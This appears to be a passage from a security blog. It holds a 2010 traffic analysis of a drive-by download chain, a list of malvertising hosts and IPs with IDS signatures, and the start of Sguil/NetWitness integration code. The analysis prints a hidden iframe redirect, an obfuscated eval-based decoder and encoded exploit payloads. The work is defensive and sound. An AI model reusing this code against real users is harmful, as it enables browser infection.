Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: c3metrics.net
Connection: Keep-Alive
As you can see, the response to this will not contain anything as it is just for statistics and tracking purposes:
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 0
Next we will look at the request to the wilstose.co.cc host, this is a request to an intermediary system that will produce a redirect to the actual drive by site:
GET /zmtrc.php?pq=cust1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://us.mc1117.mail.yahoo.com/mc/md.php?en=CP1252&v=1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: wilstose.co.cc
Connection: Keep-Alive
The response contained within includes the actual link to the live running drive by site contained within a hidden IFRAME:
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Mon, 02 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 133
<html>
<body>
<iframe src="http://bbcxq.com/ar/putyq.php" style="visibility:hidden;" width="1" height="1"></iframe>
</body>
</html>
This will now cause the client to perform a request against the bbcxq.com site:
GET /ar/putyq.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://wilstose.co.cc/zmtrc.php?pq=cust1
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: bbcxq.com
Connection: Keep-Alive
The response to this request will again serve up some obfuscated data that has to be de obfuscated using the script refrenced in the response (in this case it is named rnrt.js):
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 1615
Content-Type: text/html
Date: Mon, 02 Aug 2010 <REMOVED>
Keep-Alive: timeout=1, max=100
Server: Apache/2
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.14
<html>
<head>
<script src="rnrt.js"></script>
</head>
<body uskbfxyp onload="OUWD();" nbl>(EG)(NB)(X_)
<input type="hidden" id="tm" value="4">(YU)(DJ)(KJ)
<input type="hidden" id="GVaV" value="12#c63@f#b9773@0~2#68@8@94b60~64d3@618@98@db5a!768@ecebf#de7c743@f#73@417496e91114f#65c2#52#b52#df#d5c46656ddc8@16bb8@d641e2#a!98@65cda!e713@8@f#3@12#50~177b8@7f#a!b7a!f#cf#dd7d0~143@a!8@4158@b78@42#8@a!f#2#461f#72#4944db66e1f#158@8@ca!8@3@f#9592#5f#8@d42#47e67a!c0~2#e6da!a!7d650~6477b8@a!0~cf#76a!3@3@0~740~c657def#3@143@e42#cc61447d7f#9e55c47c4b4a!c6ba!5795a!2#78@3@48@7f#5560~2#3@111beec2#3@68@416c4cb0~3@a!498@2#b73@c53@13@0~df#a!52#8@ce50~8@6b6e6cd55d18@710~f#2#9de2#69cc7a!3@b2#7f#d3@973@518@6c4c1e17ca!3@548@68@eb18@8@b2#2#14f#b3@0~94a!457493@1918@9b0~9c1b7eb8@b9cb7490~8@748@9d7748@5563@1ef#3@2#f#58@b5c11c7be0~0~e99d174bf#59574ba!92#72#bc3@655de5f#d54c12#b3@5969db0~f#cb4bb63@8@3@5198@a!c78@40~2#452#41f#d518@4650~75f#f#e3@f#f#65760~b42#3@55466e613@2#dbe5c2#1f#54f#cdf#bcc7c10~d595db8@68@8@953@3@0~0~613@cbf#9c3@e0~7dc190~6df#8@f#3@0~ca!ea!cf#0~9bcb0~40~48@c8@78@8@cb0~8@2#2#be7678@61950~da!75f#3@a!8@4e10~7dd15cce8@d58@eb0~c6a!77448@63@f#b7b5c1f#8@43@8@8@98@8@f#8@40~3@3@2#6f#cb1169112#4e13@d42#d963@0~d13@40~8@3@e6e7a!3@3@98@46d0~5c1998@60~62#55148@b196652#10~3@1540~b2#60~8@a!1a!c1c9ea!b48@1ed698@e5d72#a!5b2#2#5d660~7dd12#f#c3@2#f#ca!50~464596ebb0~2#0~2#c0~3@f#60~5e140~95d719f#4cb69a!f#">
<input type="hidden" id="xe" value="4">(P_)(MT)(GZ)
</body>
</html>
This response causes the client to ask the server for the contents of the rnrt.js file, so the next request is made:
GET /ar/rnrt.js HTTP/1.1
Accept: */*
Referer: http://bbcxq.com/ar/putyq.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: bbcxq.com
Connection: Keep-Alive
This delivers back the following response which has the JavaScript that will deobfuscate the data held within the hidden HTML input tag with the id of “GVaV”:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Length: 652
Content-Type: application/javascript
Date: Mon, 02 Aug 2010 <REMOVED>
ETag: <REMOVED>
Keep-Alive: timeout=1, max=99
Last-Modified: Mon, 02 Aug 2010 <REMOVED>
Server: Apache/2
Vary: Accept-Encoding,User-Agent
var _ryf=new Object();function hmww_(id){return (_ryf[id])?_ryf[id]:_ryf[id]=document.getElementById(id);};function OUWD(){var ZpG=String;var fnuk=Math;var pbRy='floorwuBYZXz'.replace(/[wuBYZXz]/g,'');var vPkaT=16;var YQu_='fromCnSTzBk'.replace(/[nSTzBk]/g,'')+"harCo"+"VwAdenygv".substr(3,2);var JbG=256;var Bau_=ZpG("evhwv".substr(0,2)+"al");var ru_bz=this;var GVaV=hmww_"GVaV").value;GVaV=GVaV.replace(/[\~@#\!]/g,'');var U_CZ=[471,541,759,116];var zRQQ="";for(var gn_=0;gn_<GVaV.length/2;++gn_){var C_YL=parseInt(GVaV.substr(gn_*2,2),vPkaT)-(gn_+2)*U_CZ[gn_%4];if(C_YL<0){C_YL-=fnuk[pbRy](C_YL/JbG)*JbG;}zRQQ+=ZpG[YQu_](C_YL);}ru_bz[Bau_](zRQQ);}
Upon the execution of this JavaScript, this will cause the client to POST back information to the server about what type of exploits to serve up. The JavaScript attempts to determine if the host had Acrobat, or Java (among other things) installed and then the appropriate malicious PDF or Java class will be served up to the client.
POST /ar/putyq.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://bbcxq.com/ar/putyq.php
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: bbcxq.com
Content-Length: 40
Connection: Keep-Alive
Cache-Control: no-cache
id=53104c390ee1ebc861a1938a5958ea63%26np
The values at the end of the ID is what tells the drive by what types of exploits to serve up. In this case the “np” at the end means “no java” and “yes pdf”. However, the ID’s can be the following values:
np = no java, yes pdf
jp = yes java, yes pdf
n = no java, no pdf
j = yes java, no pdf
The response to this POST contains the following obfuscated data that is processed and deobfuscated again by the rnrt.js file:
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 9310
Content-Type: text/html
Date: Mon, 02 Aug 2010 <REMOVED>
Keep-Alive: timeout=1, max=100
Server: Apache/2
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.2.14
<html>
<head>
<script src="rnrt.js"></script>
</head>
<body oz_ljh_h onload="OUWD();" zub>(LR)(X_)(YP)
<input type="hidden" id="_x" value="4">(BH)(TJ)(SY)
<input type="hidden" id="GVaV" value="14#cc4#a!#@~a!#@~77e34#278@28@6b20!24#53226d8@23924#f75ffe0!10!96b74#a!#@~78@739252f94#166bf1fe53f50!da!#@~0!a!#@~bcbc4#0!e696df8@57ca!#@~a!#@~5f395f4#18@1624#34#a!#@~172116e0!4#f55f6a!#@~fe4#f8@0!e76f536a!#@~18@f9ce0!c617bf4#6a!#@~4#264#7d573b2a!#@~0!4#d57c1d9b7259635320!4#59766db1ef20!0!cca!#@~c62f5a!#@~a!#@~a!#@~c5d4#b38@69530!3b29727ff2e8@1de350!0!b0!9fa!#@~8@cbbea!#@~8@f4#990!72fdbd9b510!d3179577c621fdbc91d2df62d4#6cf8@eb2eba!#@~b4#fd953d26375e99d318@a!#@~318@10!0!2bd21b8@f4#92f2c5ba!#@~96efb794#e27f74#3a!#@~14#fa!#@~91c0!215a!#@~5e7613e4#76ba!#@~6e71f3fcd6c4#75367e515278@c4#bf8@f0!e18@68@f8@3390!17355997e8@95a!#@~f62d5d365e594#0!f9ef0!61cd8@1f50!c56d670!2ce76ff5cb30!f73e58@5168@620!279be9d4#4#ea!#@~97e4#0!2a!#@~8@28@6b5f556f5eeed1a!#@~9395a!#@~ff8@e30!a!#@~9674#4#c70!76595a!#@~f8@5260!b77232255c8@b0!ef5b8@12b1da!#@~0!3c58@15c270!2956a!#@~7a!#@~637e3528@e221e1397ee79de90!90!1b8@3f7de64#fa!#@~3f3c65dfd699126fedd6df670!18@56b90!d6f0!58@7662c1659a!#@~68@6de2e0!f0!eccbc2d92a!#@~2d4#d8@0!a!#@~3e8@72c68@5c778@2ea!#@~3cf4#cc58@0!91b37d5a!#@~0!b79d4#5d0!b6f9b7664#50!de8@4#f61a!#@~594#64#170!6cf31a!#@~d758@4#0!e7cccf0!f65a!#@~d34#0!8@74#f7dd9a!#@~629cd5f75bbefda!#@~66c9964#8@4#2a!#@~2b9c4#297a!#@~3b2dbe0!28@99dc514#0!50!ba!#@~fe8@3e78@90!a!#@~c8@70!0!6a!#@~8@0!e1734#65d7de9112694#15cff327cbda!#@~b98@94#2a!#@~98@8@c2a!#@~4#94#5c0!b2d5d365d56ffcee2fbdb8@f0!9630!2a!#@~3a!#@~5f9cd71ba!#@~4#1b14#0!5be24#bc4#7d0!a!#@~5cd0!d58@20!3937f3f24#8@3d5a!#@~a!#@~b4#293a!#@~23e219919a!#@~73a!#@~fa!#@~1f78@4#7b0!1367b8@594#b14#56cf31ef73a!#@~4#bddcec29651ddd216a!#@~6be956e3a!#@~94#73ce63310!f33124#518@758@be8@d99712197f4#0!6cea!#@~34#9ce0!c61bbf669528@27d58@0!e9a!#@~c514#9c0!beb5399255370!963bc5fa!#@~53f13118@0!0!a!#@~67916a!#@~92d4#f8@7198@375a!#@~60!658@ee0!0!511a!#@~a!#@~18@1f0!73ec8@e1e6774#5d0!a!#@~9fcc1998@0!0!e357556795c2b2b0!71530!f3714#914#c3b9f0!f8@8@d21719d1b7a!#@~db9d34#a!#@~4#1a!#@~4#7bb0!1dc7190!550!30!0!64#a!#@~78@2297a!#@~3b2dbdfc5d97d8@18@0!2dd6fa!#@~350!797fbcbbb95b8@3132e355631e718@e3bd54#fef2e8@cbd0!c4#3df8@7fa!#@~1d8@b8@8@e574#220!6b324#a!#@~9e4#0!0!3fd0!f18@ca!#@~0!a!#@~3c0!b98@a!#@~dea!#@~e171ff69bc0!26de18@d18@b70!b27b0!17bd4#ea!#@~57730!d8@8@7d8@a!#@~2d10!6f0!e2db138@4#8@ec2f9a!#@~9fa!#@~9cca!#@~4#38@66c52a!#@~2e74#616a!#@~e6e2528@5ed3d5b67a!#@~0!f998@6c2bbb59d652fa!#@~0!4#17c6f38@f9d8@ed20!d37b8@932d5dbfcda!#@~6bf34#6f57a!#@~9bedb758@eb629ed4#4#6ca!#@~7ca!#@~c63565eb50!8@6f2a!#@~922fe50!8@57be71a!#@~bf31d10!ca!#@~0!a!#@~6f8@299d7910!6759530!6a!#@~54#4#38@bf0!2d4#6ef2c0!5124#bd7e8@dd9c3e8@2b8@f9bba!#@~17723277754#7c621f27171a!#@~4#0!e9674#a!#@~1bcdc9f8@f28@a!#@~2132d36d8@1e0!a!#@~a!#@~2a!#@~d958@79fd34#8@d5cd8@8@ff8@1159a!#@~38@8@d1291be0!a!#@~d155b54#a!#@~5c9b7e4#65992f3c4#18@56fb0!3939cb4#0!f90!94#398@d5f58@30!ccda!#@~9df9c8@d7957f4#69659768@6119f3f8@21e96b50!fdd5a!#@~bc4#f58@90!754#b5597fa!#@~c914#5bf20!8@9f91bb0!4#9c9930!8@25b5d37c1d692f0!cdd39a!#@~764#b925e7d8@b1d94#368@71a!#@~9bbc0!4#d95fb34#4#54#957c4#0!519cf1ce10!50!f90!d9b96b20!998@9e378@757523ec6d297f7c2df9f7d4#0!9e5374#8@0!19993d8@c1690!b30!9d554#ba!#@~4#950!9a!#@~734#55d91f8@c31c55f0!0!2979bb90!e94#933e8@c535735cbde9cfec7db94#74#4#59a!#@~58@7b8@5159e34#8@11295ba!#@~0!ed159b14#e5c9f7a!#@~4#a!#@~5996ffc8@18@5a!#@~f70!79390!b0!0!390!98@358@15f5c3cc0!da!#@~91f5ccd7997b4#a!#@~965d728@a!#@~11933b8@61e9a!#@~b10!3dd5eb8@4#358@94#714#f559bf6cd14#5ffe0!c9f95b70!8@9c9d3c8@65b5133c5d696fcc1d39e72d0!20!937b6dee28@31ccff733ced1c27c3eb18@5dbb14#e5c4#224#21395a!#@~5b0!bfa!#@~f91526a!#@~11e8@6f3a!#@~660!b28@e6d0!a!#@~6f68@38@5bd58@91690!4#8@76d51a!#@~7f2eb978@f30!b8@8@d8@a!#@~8@0!24#bf0!19e2238@b6a!#@~b4#e5ecde97b8@3b373d5d5eb4#10!2dba!#@~28@ecf4#169eca!#@~c0!7a!#@~16a!#@~0!9ddb7f8@3662a!#@~f8@5c358@674#4#10!0!e7df18@d0!4#354#f1a!#@~0!a!#@~1c9c8@7a!#@~0!0!37a!#@~e4#552b28@8@10!bb2b5ced13934#0!ba!#@~660!c198@cc28@8@fc50!23f4#d520!8@16ba!#@~8@f9e2d790!cb3250!64#998@ec4#4#16a!#@~ea!#@~38@1c38@4#6a!#@~efa!#@~0!0!a!#@~c26d0!d50!397a!#@~ca!#@~55e0!8@8@8@7dc177694#51ceb4#514#735f27edca!#@~e0!0!4#b0!2b4#bde8@0!8@7bfb550!eb3c8@c253fa!#@~d68@f8@9a!#@~174#bc8@f2962b90!5a!#@~0!6fc6cb673e33b0!6f2be0!0!6b5f90!d8@c8@cf78@a!#@~c1a!#@~4#e5370!8@1c124#4#bd8@2b0!c18@2ea!#@~be4#e0!9617b8@b7ee8@79c8@54#20!4#7c50!a!#@~6794#c25ffe8@28@f55b5d0!4#c5b6d0!e0!95134#3bc6770!b39f38@c632790!0!2ca!#@~8@50!dc8@60!f33a!#@~8@da!#@~8@b10!70!3dffe4#4#59673c0!15f3e99ce54#f5d78@b5a!#@~bcd54#8@90!e3b38@5b5eb71720!c72fe8@fd2297d1cd7210!a!#@~694#ce8@4#8@1672a!#@~fb6230!9374#34#0!5e7e0!10!d54#25ceca!#@~8@a!#@~5c3d57bf63ca!#@~94#8@52b38@b10!bb2b5ced13934#0!ba!#@~660!c198@cc28@8@fc50!23f4#d520!8@16ba!#@~8@f8@ded78@9c4#38@4#b6d9b8@ec4#4#0!6cea!#@~38@1d394#6a!#@~cf8@0!5a!#@~224#dcd0!0!699a!#@~ca!#@~55f0!c8@8@75ba!#@~7c64#4#517ef4#0!1572631ce8@ced30!0!b52650!e0!8@0!8@ec2b0!55e234#8@c253fa!#@~d68@f79c174#ec9f2922690!58@0!4#fc67b0!73e23b0!6ecb90!8@6260!94#d5bedc77a!#@~0!1f4#8@5270!7bbb294#0!dd38@0!0!1d3a!#@~9fe1e4#94#13bdb4#eb8@7a!#@~18@d4#20!0!755a!#@~9e7750!20!0!1eb28@fc5d5711cdb2d0!e598@0!e4#4#c0!696a!#@~b8@9d36c62c790!a!#@~22a!#@~0!54#d97e14#31a!#@~4#da!#@~8@8@0!c7736ffee4#0!9d6fc0!15f2e8@9ce54#e5f78@b5a!#@~a!#@~cc54#8@c0!93b355663a!#@~f1125c323edf520!97c9c4#770!ba!#@~594#db7f8@76d2a!#@~0!0!64#30!8@b6b3e0!0!e7df15d0!4#b5ceca!#@~59fcdc8@77fe37a!#@~c4#552b4#8@c10!ba!#@~265ce50!e98@38@b56b1114#8@7c8@7bfa!#@~5c1ef9d120!8@4#6ca!#@~8@f8@e0!d78@ecb3250!6598@8@ec4#4#0!65ea!#@~4#0!2330!4#ba!#@~cfe0!0!a!#@~71fd5d0!0!a!#@~97a!#@~ca!#@~55e0!8@8@8@75bc7b64#4#517f54#0!1b725f21e4#d3d3fdb4#324#7d98@4#8@7bbb8@54#de399520!4#2a!#@~d68@fb9b174#9c4#f78@b259558@ff0!8@67a!#@~a!#@~78@dd360!6ecb8@0!56268@9dd0!c3d375a!#@~0!274#e4#8@757a!#@~c324#4#bd62b0!515339fe1e4#9613bdb4#ea!#@~8@7998@4#4#7fb7555a!#@~66f54#24#fa!#@~ec2cf0!5e5c0!4#c7b8@cbe8@970!e4#6c260!71bb98@3dcc277b0!8@22a!#@~256d0!8@6162ca!#@~7e0!8@3127a!#@~36ffe94#0!9b77c0!1a!#@~fa!#@~dfa!#@~4#ea!#@~4#a!#@~5f8@3b0!a!#@~bcc5c8@0!0!73f3950!63b4#1620!bf27edf0!21a!#@~1c4#c57614#a!#@~0!95d38@37c652ef8@58@378@c673c0!a!#@~e2e0!15d8@3e54#f0!a!#@~59a!#@~c8@cd79f63ca!#@~94#652b0!8@515a!#@~e24#61e4#0!a!#@~98@3db9660!c18@8@5c28@7f8@50!23f3d120!7f69a!#@~cf0!dbdc8@ec0!3b5760!9a!#@~9bbf4#165ee331d34#4#a!#@~a!#@~7fb0!6a!#@~227dbd0!0!393b5a!#@~0!5f0!8@9270!bb7b6c4#0!1bf74#0!1a!#@~7a!#@~5f24#ea!#@~ca!#@~dd0!3b0!2b4#be0!8@0!8@7c0!b550!e334#9520!3fa!#@~76df0!9f234#4#ca!#@~fd8@b259556ff0!164#a!#@~f73e53b0!6ecb90!a!#@~6260!94#d5beda!#@~79a!#@~0!274#f4#8@757a!#@~c124#4#5d630!0!0!1d3b9fe1e594#13c0!b4#e68@e9c8@0!4#e0!670!5ca!#@~56f592dfa!#@~e8@2df8@565c0!8@c9b2d0!e5960!e4#4#c16a!#@~6a!#@~bba!#@~230!d22e74#0!526a!#@~350!d58@214#2ca!#@~5de8@f0!8@753a!#@~0!3e4#4#79a!#@~6bc8@15eee7a!#@~6e0!565978@b5a!#@~bd254#8@50!73f30!5764#a!#@~f1629ba!#@~2bf2f0!219cc4#c57610!a!#@~0!95d38@97c6c31f35d358@c67390!4#e7db1ddd3e54#f0!a!#@~99a!#@~d0!d370!fb3bb0!4#0!5da!#@~f8@0!15b324#5ce50!e9f38@b56a!#@~0!b14#8@5c68@0!f0!5523f7cc28@7e63b1f4#d6df8@9c0!395160!98@95bf4#366ea!#@~3a!#@~20!30!53a!#@~df4#0!7a!#@~a!#@~1bd7d6fe97b3a!#@~0!610!98@8@7a!#@~c0!776b4#612f54#610!75651ce7d5d30!4#b8@2651e18@0!8@dc6b0!5ce22f932b3a!#@~b0!6ef0!a!#@~3234#4#cdfb8@b28@9a!#@~4#e0!4#0!16ca!#@~a!#@~8@0!e4#30!0!becbd0!0!696190!d7ca!#@~cf73a!#@~c1a!#@~4#a!#@~4#e70!7dc224#4#cda!#@~2b0!a!#@~1d2ea!#@~a!#@~e7e0!9617b8@b7f18@7a!#@~18@64#20!8@7c50!a!#@~b78@4#c28@0!4#e32df5625711ccb2d0!e5990!e4#6c260!71bf98@37d2277b0!622a!#@~0!55da!#@~7e1c37a!#@~0!df8@8@1170!3bfbef4#0!976fcb10!f3e3a!#@~5e0!4#f578@4#b0!a!#@~bcb60!8@0!0!94#130!58@69a!#@~f1724#ba!#@~2a!#@~eef0!1ea!#@~2c4#cb790!ba!#@~b9bce8@68@260!2ff760!30!8@b6b390!0!e7df1cd0!4#354#f2a!#@~0!a!#@~7d0!c8@75fb4#1a!#@~4#4#557b38@0!18@b8@1f61e4#0!f933db66a!#@~0!7198@4#c778@ed4#d2dffcf67b1a!#@~99eefcc14#c8@0!8@4#4#4#16fda!#@~c30!530!a!#@~1de4#4#0!c68@8@9de3d4#1db5d18@d235d5e5d5a!#@~23ca!#@~1b0!efb8@9d8@25a!#@~e73b4#da!#@~8@a!#@~551210!3cef5bf674#91bb9ca!#@~d0!f8@98@24#6cc2698@2dc64#ebdd5d7bbbf27f5a!#@~d24#b0!e3d62f1a!#@~c20!4#54#e2ffa!#@~3d98@a!#@~4#d8@0!9ba!#@~ca!#@~b7dd528@b8@4#6b76a!#@~b28@3de16c0!25767e7f128@d259f5e62fcfcd7c3d37a!#@~98@dd9a!#@~b94#1bfa!#@~d72ced6598@0!60!7eb13f5d8@568@5f996b3fbd12cc161ba!#@~3563d4#8@613c4#4#765e6d58@3fc6b3a!#@~f2e14#fca!#@~a!#@~ef7592f18@de28@4#c8@9bbe8@f3c98@9c4#4#674#728@8@75eb4#960!f21f29ed25e8@0!b0!2a!#@~74#fe7cc11c778@5d393a!#@~94#73d1a!#@~b6c3a!#@~ded8@1f0!c7593e8@9da!#@~9">
<input type="hidden" id="ni" value="4">(GI)(VN)(_G)
</body>
</html>
This will cause the client to now make a request for the malicious PDF:
GET /ar/k_fgvu/_tvmwh.pdf HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, pplication/msword, */*
Referer: http://bbcxq.com/ar/putyq.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; <REMOVED>)
Host: bbcxq.com
Connection: Keep-Alive
If the client is then vulnerable to the contents of this PDF, they may become infected based upon the actual payload being served up by the drive by site. This is dependant generally upon the antivirus signatures for the current malware being distributed, unfortunately the detection rates are not nearly as high as you generally may think:
http://www.virustotal.com/estadisticas.html
Hopefully if you have read this you have found it to be of some use.
We have identified several major websites (buy.com, cnbc.com, digg.com, evite.com and msn.com just to name a few) using the advertising services of malicious servers that are using Acrobat PDF and Java exploits to force the download and installation of fake antivirus software. Analysis from SysAdMini @ www.malwaredomainlist.com has informed us the sites are all using the NeoSploit drive-by kit. After further reseach, we found that Jiri Sejtko from Avast! has actually documented this and written up a great blog entry about this back on Feb 18th, 2010. It is unbelievable that online advertisers the likes of yieldmanager.com, fimserve.com, advertangel.com, bannerimg.com, jambovideonetwork.com, myspace.com, zedo.com, vestraff.com and others allowed this to occur and even thrive for the better part of a month. The host names hosting the drive-by and fake antivirus software that we have discovered so far are:
google.analytics.com.bazqrhafrrh.info
google.analytics.com.bidxctvqvwrw.info
google.analytics.com.byuigracdnjj.info
google.analytics.com.ckzqfrxaxihi.info
google.analytics.com.cvybexpnqhlx.info
google.analytics.com.dbvvwrkgycfa.info
google.analytics.com.dcghkoixsagu.info
google.analytics.com.dfxlhdyffzho.info
google.analytics.com.dwldxeqavts.info
google.analytics.com.dygpcewrjnw.info
google.analytics.com.eliyisgtkaj.info
google.analytics.com.eututrywxvhd.info
google.analytics.com.ezqaxnmsbs.info
google.analytics.com.friavuzpsvxc.info
google.analytics.com.fywthroeasx.info
google.analytics.com.gopbaqvgprvh.info
google.analytics.com.hjvcnunmtzc.info
google.analytics.com.hnstetlseuop.info
google.analytics.com.hzlyaejcvmat.info
google.analytics.com.inxvwrxogrc.info
google.analytics.com.jestywtvadgj.info
google.analytics.com.jgvsjnhmvngn.info
google.analytics.com.jjotqkhqymp.info
google.analytics.com.jklnznqvztu.info
google.analytics.com.jtmqypcgt.info
google.analytics.com.jttyhhvcxmbz.info
google.analytics.com.jvoamkvyxv.info
google.analytics.com.kijksoeohxze.info
google.analytics.com.kmpbfdtknwsh.info
google.analytics.com.kzpkpehthbgn.info
google.analytics.com.lsvoenxxyya.info
google.analytics.com.mnuzqxerjufm.info
google.analytics.com.muhrlwuzyaly.info
google.analytics.com.nbtislvidmq.info
google.analytics.com.nlfgjehbotwi.info
google.analytics.com.noltvoqmhoce.info
google.analytics.com.oaofmsckue.info
google.analytics.com.ocryspyjvkh.info
google.analytics.com.omvdbdcknpct.info
google.analytics.com.pmxjpigimsdv.info
google.analytics.com.prtrkmxkpctw.info
google.analytics.com.pzignbfxspou.info
google.analytics.com.qlgkmytdvyjx.info
google.analytics.com.rimofoixaf.info
google.analytics.com.rmkbyklbhawd.info
google.analytics.com.rtkffbmmgkpw.info
google.analytics.com.rxflhciirups.info
google.analytics.com.sphamifoaqpx.info
google.analytics.com.tbxierkoqze.info
google.analytics.com.tdrfhdzxyb.info
google.analytics.com.tidawgeihqch.info
google.analytics.com.tklaxlxvedkt.info
google.analytics.com.tluaweyermg.info
google.analytics.com.uentfkblzpxx.info
google.analytics.com.uoncvsqcuclx.info
google.analytics.com.uuyvsrbtpjhl.info
google.analytics.com.uwbhpcrydgta.info
google.analytics.com.vgmhlwrixzxz.info
google.analytics.com.vujpgvscrjbk.info
google.analytics.com.vwrvqmvrvjwi.info
google.analytics.com.wwkzrjfuhmjg.info
google.analytics.com.wxrzufdrzzn.info
google.analytics.com.xewffvnixdyk.info
google.analytics.com.xkduqnxfpnfg.info
google.analytics.com.xnboetuqunld.info
google.analytics.com.yfguydudorip.info
google.analytics.com.yggxvnwumcqv.info
google.analytics.com.yhaidebpfltr.info
google.analytics.com.yynspckhyebi.info
google.analytics.com.zejdcqsoglao.info
google.analytics.com.zelhnalbivd.info
google.analytics.com.zsrsjnihnb.info
google.analytics.com.zugponkeqtzz.info
All of these host names resolved to the following IP addresses at this time:
69.174.245.147
69.174.245.148
69.174.245.150
72.51.41.155
75.125.183.50
174.142.53.148
We have been observing this for a few days and have been checking our repository of traffic and this goes back even further than Feb 15th, 2010. The signature that will trip on the download of the malware more often than not is this one:
ET POLICY Binary Download Smaller than 1 MB Likely Hostile
http://doc.emergingthreats.net/2007671
Once a client is infected, the following signatures trip:
ET TROJAN Potential FakeAV HTTP GET Check-IN (/check)
http://doc.emergingthreats.net/2010597
ET TROJAN Potential FakeAV HTTP POST Check-IN (?r=)
http://doc.emergingthreats.net/2010594
ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)
http://doc.emergingthreats.net/2002400
The infected client will attempt to check-in to the follwing IP Address/hostname:
79.135.152.5 – avgroupwebsite.com
195.88.190.54 – av-command.com/av-crew.net
This campaign seems to have been very effective and we know of thousands of hosts that have been exploited by this campaign.
We have finished up our first round of testing against the modified version of the Sguil client (we have modified the 0.7.0 CVS version). Using the alert information displayed in the Sguil client we create a query and feed it into the NetWitness API through a vbscript which calls explorer.exe and passes it a NetWitness URL. When you install NetWitness Investigator, it registers the nw://<url> as a protocol within the OS. This URL is the API/method by which you can use alerting from other products to find specific sessions, ip’s or timeframes of traffic to review in any combination.
To do this, we first modified the Xscript section of sguil.tk and removed the transcript and wireshark options as we are now relying upon NetWitness for pcap capture instead of daemonlogger/sancp/tcpdump etc:
# Xscript Menu
set eventIDMenut [ menu .eventIDMenut -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND \
-activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND -tearoff 0 ]
$eventIDMenut add command -label "Event History" -command "GetEventHistory"
$eventIDMenut add command -label "NetWitness Src -> Dst" -command "NetWitnessEvent from"
$eventIDMenut add command -label "NetWitness Dst -> Src" -command "NetWitnessEvent to"
You can see that we are calling the command NetWitnessEvent and passing it a value of from or to. The reason for this is that events that are triggered list the source and destination IP address for the particular packet that caused the alert. However, NetWitness is session aware, so you may need to query using the source address as the destination and vice versa. This is calling the NetWitnessEvent function that we have added to lib/extdata.tcl:
proc NetWitnessEvent { direction } {
global ACTIVE_EVENT SERVERHOST XSCRIPT_SERVER_PORT DEBUG CUR_SEL_PANE XSCRIPTDATARCVD
global socketWinName SESSION_STATE WIRESHARK_STORE_DIR WIRESHARK_PATH
if {!$ACTIVE_EVENT} {return}
set selectedIndex [$CUR_SEL_PANE(name) curselection]
set sidcidList [split [$CUR_SEL_PANE(name) getcells $selectedIndex,alertID] .]
set cnxID [lindex $sidcidList 1]
set sensorID [lindex $sidcidList 0]
set proto [$CUR_SEL_PANE(name) getcells $selectedIndex,ipproto]
set srcIP [$CUR_SEL_PANE(name) getcells $selectedIndex,srcip]
set srcPort [$CUR_SEL_PANE(name) getcells $selectedIndex,srcport]
set dstIP [$CUR_SEL_PANE(name) getcells $selectedIndex,dstip]
set dstPort [$CUR_SEL_PANE(name) getcells $selectedIndex,dstport]
if { $CUR_SEL_PANE(format) == "SSN" } {
set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,starttime]
} else {
set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,date]
}
set future [clock scan "2 minute" -base [clock scan $timestamp -gmt 1]]
set past [clock scan "-2 minute" -base [clock scan $timestamp -gmt 1]]
set future [clock format $future -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
set past [clock format $past -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
set future [regsub -all -expanded {[\:]} $future {%3A}]
set past [regsub -all -expanded {[\:]} $past {%3A}]
if { $proto == "6" } {
if { $direction == "from" } {
